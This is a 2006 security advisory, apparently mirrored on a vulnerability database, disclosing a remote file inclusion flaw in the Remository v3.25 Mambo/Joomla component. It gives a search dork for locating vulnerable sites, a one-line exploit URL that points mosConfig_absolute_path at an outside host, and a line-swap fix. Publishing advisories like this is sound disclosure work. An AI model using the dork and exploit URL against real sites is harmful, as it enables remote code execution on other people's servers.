Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13862
HistoryAug 11, 2006 - 12:00 a.m.

Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability

2006-08-1100:00:00
vulners.com
349

.:[ insecurity research team ]:.

..:...:. .

.:. | |/ \:/ ___// __ \:/ _\.:.

: | | | \\____\\ _/\ / :. .

…: ||| /___ >\___ >\___ >.:

.:… … .\/ .:\/:. .\/. .:\/:

. …:. .advisory. .:…

:…: o9.o8.2oo6 …

Affected Application: Remository v3.25

(Mambo/Joomla CMS Component)

. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

Discoverd by: camino

Team: Insecurity Research Team

URL: http://www.insecurityresearch.org

E-Mail: camino (at) sexmagnet (dot) com [email concealed]

. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .

Typ: Remote [x] Local [ ]

Remote File Inclusion [x] SQL Injection [ ]

Level: Low [ ] Middle [x] High [ ]

Application: Remository

Version: 3.25

Vulnerable File: admin.remository.php

URL: http://www.remository.com

Description: It's a component that works with Mambo CMS 4.5+ to

provide a selection of files that users can download.

Dork: intext:"Remository 3.25. is technology by Black Sheep Research"

inurl:"com_remository"

. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

http://[sitepath]/[joomlapath]/administrator/components/

com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?

. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .

o1.) open admin.remository.php

o2.) take a look at line 16:

require_once ($mosConfig_absolute_path.'/components/

com_remository/com_remository_constants.php');

o3.) take a look at line 19:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location

is not allowed.' );

o4.) exchange line 19 with line 16!

. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .

brOmstar and all the sexy members of insecurity research team ;-)